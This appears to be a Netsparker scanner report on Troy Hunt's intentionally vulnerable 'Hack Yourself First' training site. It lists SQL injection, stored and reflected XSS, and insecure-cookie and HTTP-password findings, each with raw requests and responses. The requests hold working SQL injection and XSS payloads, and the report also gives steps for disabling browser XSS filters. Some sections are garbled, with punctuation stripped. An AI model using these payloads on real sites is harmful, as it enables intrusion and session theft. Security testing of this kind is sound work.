Identified Cookie
AuthCookie

Request
POST /Account/Login HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/Account/Login
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=EA9A3D322DD4B030B3239FA3119364226C4AFC1146DACC18C04B897769A79F835F0F451B34A8B312CD8F5A77E3B5421B58074E3E4C68E5FA779CCC709E259C828EFF4936F4BB152D308EA778C82324B3CAF1BA60C0C18C134AEB7C5A5153AF181C536B617EF3F6DFB1052DDB94CFEB3F91DCFE08967136E4266A5E8249781E2F; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 57
Content-Type: application/x-www-form-urlencoded

Email=netsparker%40example.com&Password=3&RememberMe=true
Response
HTTP/1.1 302 Found
Cache-Control: private
Date: Mon, 25 Aug 2014 22:59:00 GMT
Location: http://hackyourselffirst.troyhunt.com/
Server: Microsoft-IIS/8.0
Set-Cookie: AuthCookie=83F87081CDBC4CAC96FBBA3C773F139F952893E2A76E1B1AD3A6E8C32B935F9A14A7467ADD80BBC637E096BB698E00D1E437A060334677EA4A758738F5F619C1C59687F889818B80FF72D699D7B9FEA6F2F89F33E2A38DABBD39EEE2F5538787A104A63D8131741D813003A6B1E980EF52692C81A2395EB8B18B21613B890AF7; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
Set-Cookie: Password=Mw==; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
Set-Cookie: Email=netsparker@example.com; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 155
Content-Type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://hackyourselffirst.troyhunt.com/">here</a>.</h2></body></html>
7 Out-of-date Version (Microsoft SQL Server)
IMPORTANT - 1 total

Netsparker identified you are using an out-of-date version of Microsoft SQL Server.

Impact
Since this is an old version of the software, it may be vulnerable to attacks.

Remedy
Please upgrade your installation of Microsoft SQL Server to the latest stable version.

Classification: OWASP 2010-A6, OWASP 2013-A9, PCI V2.0-6.1, PCI V3.0-6.1, CAPEC-310
7.1 /Make/1
http://hackyourselffirst.troyhunt.com/Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA

Identified Version
11.0.9222.17

Latest Version
12.0.2000

Vulnerability Database
Result is based on 18/08/2014 vulnerability database content.

Request
GET /Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 500 Internal Server Error
Cache-Control: private
Date: Mon, 25 Aug 2014 22:59:55 GMT
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px} b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px} H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red } H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon } pre {font-family:"Consolas","Lucida Console",Monospace;font-size:11pt;margin:0;padding:0.5em;line-height:14pt} .marker {font-weight: bold; color: black;text-decoration: none;} .version {color: gray;} .error {margin-bottom: 10px;} .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; } @media screen and (max-width: 639px) { pre { width: 440px; overflow: auto; white-space: pre-wrap; word-wrap: break-word; } } @media screen and (max-width: 479px) { pre { width: 280px; } } </style></head>
<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please revie…
8 Critical Form Served over HTTP
MEDIUM - 1 total, 1 confirmed

Netsparker detected that a critical form is served over HTTP.

Impact
If an attacker can carry out a man-in-the-middle attack, he/she may be able to intercept traffic by injecting JavaScript code into this page or changing the action of the HTTP code to steal the user's password. Even though the target page is HTTPS, this does not protect the system against man-in-the-middle attacks.

This issue is important as it negates the use of SSL as a privacy protection barrier.

Actions to Take
1. See the remedy for solution.
2. Move all of your critical forms to HTTPS and do not allow these pages to be served over HTTP.

Remedy
All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.

Classification: OWASP 2010-A9, OWASP 2013-A6, PCI V2.0-6.5.4, PCI V3.0-6.5.4, CWE-319, CAPEC-65, WASC-04
8.1 /Account/Login (CONFIRMED)
http://hackyourselffirst.troyhunt.com/Account/Login

Form target action
https://hackyourselffirst.troyhunt.com/Account/Login

Request
GET /Account/Login HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 22:58:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 2549
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Log in - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet">
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li><l…
9 [Possible] Cross-site Scripting
MEDIUM - 3 total

Netsparker detected possible cross-site scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.

This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.

Although Netsparker believes there is a cross-site scripting in here, it could not confirm it. We strongly recommend investigating the issue manually to ensure it is cross-site scripting and needs to be addressed.

Impact
There are many different attacks that can be leveraged through the use of XSS, including:
- Hijacking the user's active session
- Changing the look of the page within the victim's browser
- Mounting a successful phishing attack
- Intercepting data and performing man-in-the-middle attacks

Remedy
This issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered/encoded. Output should be filtered/encoded according to the output format and location.

There are a number of pre-defined, well-structured whitelist libraries available for many different environments. Good examples of these include OWASP Reform and Microsoft Anti-cross-site scripting libraries.

Remedy References
[ASP.NET] - Microsoft Anti-XSS Library
OWASP XSS Prevention Cheat Sheet

External References
XSS Cheat Sheet
OWASP - Cross-site Scripting
XSS Shell
XSS Tunnelling

Classification: OWASP 2010-A2, OWASP 2013-A3, PCI V2.0-6.5.7, PCI V3.0-6.5.7, CWE-79, CAPEC-19, WASC-08
9.1 /api/vote
http://hackyourselffirst.troyhunt.com/api/vote

Parameters
Parameter    Type   Value
userId       POST   1
supercarId   POST   3
comments     POST   "--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>

Notes
Due to the Content-type header of the response, exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. The Content-type header indicates that there is a possibility of exploitation by changing the attack. However, Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally, lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing, such as Internet Explorer.
Request
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 90
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments="--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>

Response
HTTP/1.1 500 Internal Server Error
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:20:47 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 2985
Content-Type: application/json; charset=utf-8
Expires: -1

{"Message":"An error has occurred.","ExceptionMessage":"Unclosed quotation mark after the character string '\"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>')'.\r\nIncorrect syntax near '\"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>')'.","ExceptionType":"System.Data.SqlClient.SqlException","StackTrace":"   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)\r\n   at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)\r\n   at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose)\r\n   at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady)\r\n   at System.Data.SqlClient.SqlCommand.RunExecuteNonQueryTds(String methodName, Boolean async, Int32 timeout, Boolean asyncWrite)\r\n   at System.Data.SqlClient.SqlCommand.InternalExecuteNonQuery(TaskCompletionSource`1 completion, String methodName, Boolean sendToPipe, Int32 timeout, Boolean asyncWrite)\r\n   at System.Data.SqlClient.SqlCommand.ExecuteNonQuery()\r\n   at Web.Controllers.VoteController.Post(Vote vote)\r\n   at lambda_method(Closure , Object , Object[] )\r\n   at System.Web.Http.Controllers.ReflectedHttpActionDescriptor.ActionExecutor.<>c__DisplayClass10.<GetExecutor>b__9(Object instance, Object[] methodParameters)\r\n   at System.Web.Http.Controllers.ReflectedHttpActionDescriptor.ActionExecutor.Execute(Object instanc…
9.2 /api/admin
http://hackyourselffirst.troyhunt.com/api/admin?nsextt=%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt

Parameters
Parameter   Type   Value
nsextt      GET    "--></style></scRipt><scRipt>netsparker(0x0002E0)</scRipt>

Notes
Due to the Content-type header of the response, exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. The Content-type header indicates that there is a possibility of exploitation by changing the attack. However, Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally, lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing, such as Internet Explorer.

Request
GET /api/admin?nsextt=%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x0002E0)%3C/scRipt%3E HTTP/1.1
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
XSSfilteringisafeaturethatsenabledbydefaultinsomeofthemodernbrowsersItshouldonlybedisabledtemporarilytotestexploitsandshouldberevertedbackifthebrowserisactivelyusedotherthantestingpurposesEventhoughbrowsershavecertaincheckstopreventCross-sitescriptingattacksinpracticethereareavarietyofwaystobypassthismechanismthereforeawebapplicationshouldnotrelyonthiskindofclient-sidebrowserchecks
Chrome
OpencommandpromptGotofolderwherechromeexeislocatedRunthecommandchromeexe --args --disable-xss-auditor
InternetExplorer
ClickTools-gtInternetOptionsandthennavigatetotheSecurityTabClickCustomlevelandscrolltowardsthebottomwhereyouwillfindthatEnableXSSfilteriscurrentlyEnabledSetittodisabledClickOKClickYestoacceptthewarningfollowedbyApply
Firefox
GotoaboutconfigintheURLaddressbarInthesearchfieldtypeurlbarfilterandfindbrowserurlbarfilterjavascriptSetitsvaluetofalsebydoubleclickingtherow
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
16 57
31 Search CONFIRMEDhttphackyourselffirsttroyhuntcomSearchsearchTerm=2Bnetsparker(9)2B
ParametersParameter Type Value
searchTerm GET +netsparker(9)+
RequestGET SearchsearchTerm=2Bnetsparker(9)2B HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Responsehellipltsectiongtltdivgtltdivgtltdivgtltdivgtltheadergt
ltdiv class=containergtltsectiongt
lth2gtYou searched for ampquotltspan id=searchTermgt+netsparker(9)+ltspangtampquotlth2gt
ltp class=alert alert-errorgtNo results found for your searchltpgt
ltsectiongtlthrgtltfootergtltpgtampcopy 2014 - Hack Yourself Firstltpgtltfootergt
hellipgtltscriptgt
ltscriptgt$(results tr)click(function () var url = Supercar + $(this)attr(id)windowlocationhref = url)
$(searchTerm)val(+netsparker(9)+)ltscriptgt
ltscriptgt(function (i s o g r a m) i[GoogleAnalyticsObject] = r i[r] = i[r] || function () (i[r]q = i[r]q || [])push(arguments) i[rhellip
17 57
1 TOTALIMPORTANT
CONFIRMED
1
4 Permanent Cross-site ScriptingNetsparkeridentifiedpermanentcross-sitescriptingandconfirmedthisvulnerabilitybyanalyzingtheexecutionofinjectedJavaScript
PermanentXSSallowsanattackertoexecutedynamicscripts(JavaScript VBScript)inthecontextoftheapplicationThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbytheuserhasbeeninterpretedbyHTMLJavaScriptVBScriptwithinthebrowser
PermanentmeansthattheattackwillbestoredinthebackendsystemInnormalXSSattacksanattackerneedstoe-mailthevictimbutinapermanentXSSanattackercanjustexecutetheattackandwaitforuserstoseetheaffectedpageAssoonassomeonevisitsthepagetheattackersstoredpayloadwillgetexecuted
XSStargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitonlyallowsattackerstohijackotheruserssessionstheattackermightattackanadministratortogainfullcontrolovertheapplication
ImpactPermanentXSSisadangerousissuethathasmanyexploitationvectorssomeofwhichinclude
Userssession-sensitiveinformationsuchascookiescanbestolenXSScanenableclient-sidewormswhichcouldmodifydeleteorstealotherusersdatawithintheapplicationThewebsitecanberedirectedtoanewlocationdefacedorusedasaphishingsite
RemedyTheissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredOutputshouldbefilteredaccordingtotheoutputformatandlocationTypicallytheoutputlocationisHTMLWheretheoutputisHTMLensureallactivecontentisremovedpriortoitspresentationtotheserver
Priortosanitizinguserinputensureyouhaveapre-definedlistofbothexpectedandacceptablecharacterswithwhichyoupopulateawhitelistThislistneedsonlybedefinedonceandshouldbeusedtosanitizeandvalidateallsubsequentinput
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsgoodexamplesoftheseincludetheOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheetOWASPAntiSamyJava
External ReferencesXSSCheatSheetOWASP-Cross-siteScriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
41 Supercar3 CONFIRMEDhttphackyourselffirsttroyhuntcomSupercar3
Injection URLhttphackyourselffirsttroyhuntcomapivote
18 57
Injection Request
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 77
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments=%22%3e%3cnet+sparker%3dnetsparker(0x00043F)%3e

Identification Request
GET /Supercar/3 HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Injection Response
HTTP/1.1 201 Created
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:20:53 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 0
Expires: -1

Identification Response
…1)) AND ISNULL(ASCII(SUBSTRING(CAST((SELECT @@version) AS varchar(8000)),1,1)),0)=1</td></tr><tr><td>Troy Hunt</td><td>"><net sparker=netsparker(0x00043F)></td></tr><tr><td>Troy Hunt</td><td>-1 OR 1=1) AND ISNULL(ASCII(SUBSTRING(CAST((SELECT @@version) AS varchar(8000)…
1 TOTAL | IMPORTANT | 1 CONFIRMED
5. Password Transmitted over HTTP
Netsparker detected that password data is being transmitted over HTTP.
Impact
If an attacker can intercept network traffic, he/she can steal users' credentials.
Actions to Take
1. See the remedy for solution.
2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.
Remedy
All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.
Classification
OWASP 2010-A9, OWASP 2013-A6, PCI V2.0-6.5.4, PCI V3.0-6.5.4, CWE-319, CAPEC-65, WASC-04
5.1 /Account/Register CONFIRMED
http://hackyourselffirst.troyhunt.com/Account/Register
Form target action
http://hackyourselffirst.troyhunt.com/Account/Register
Request
GET /Account/Register HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 22:58:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 2265
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<title>Register - Supercar Showdown</title>
<link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<meta name="viewport" content="width=device-width" />
<link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head>
<body>
<header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li>
…
1 TOTAL | IMPORTANT | 1 CONFIRMED
6. Cookie Not Marked as Secure
Netsparker identified a cookie not marked as secure, and transmitted over HTTPS.
This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic, or following a successful man-in-the-middle attack.
Impact
This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie), an attacker might intercept it and hijack a victim's session. If the attacker can carry out a man-in-the-middle attack, he/she can force the victim to make an HTTP request to steal the cookie.
Actions to Take
1. See the remedy for solution.
2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information, you do not have to mark it as secure.)
Remedy
Mark all cookies used within the application as secure.
Required Skills for Successful Exploitation
To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or to the victim's network. Attackers need to understand layer 2, have physical access to systems either as waypoints for the traffic, or have locally gained access to a system between the victim and the web server.
External References
.NET Cookie.Secure Property
How to Create Totally Secure Cookies
Classification
OWASP 2010-A9, OWASP 2013-A6, PCI V2.0-6.5.4, PCI V3.0-6.5.4, CWE-614, CAPEC-102, WASC-15
6.1 /Account/Login CONFIRMED
https://hackyourselffirst.troyhunt.com/Account/Login
Identified Cookie
AuthCookie
Request
POST /Account/Login HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/Account/Login
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
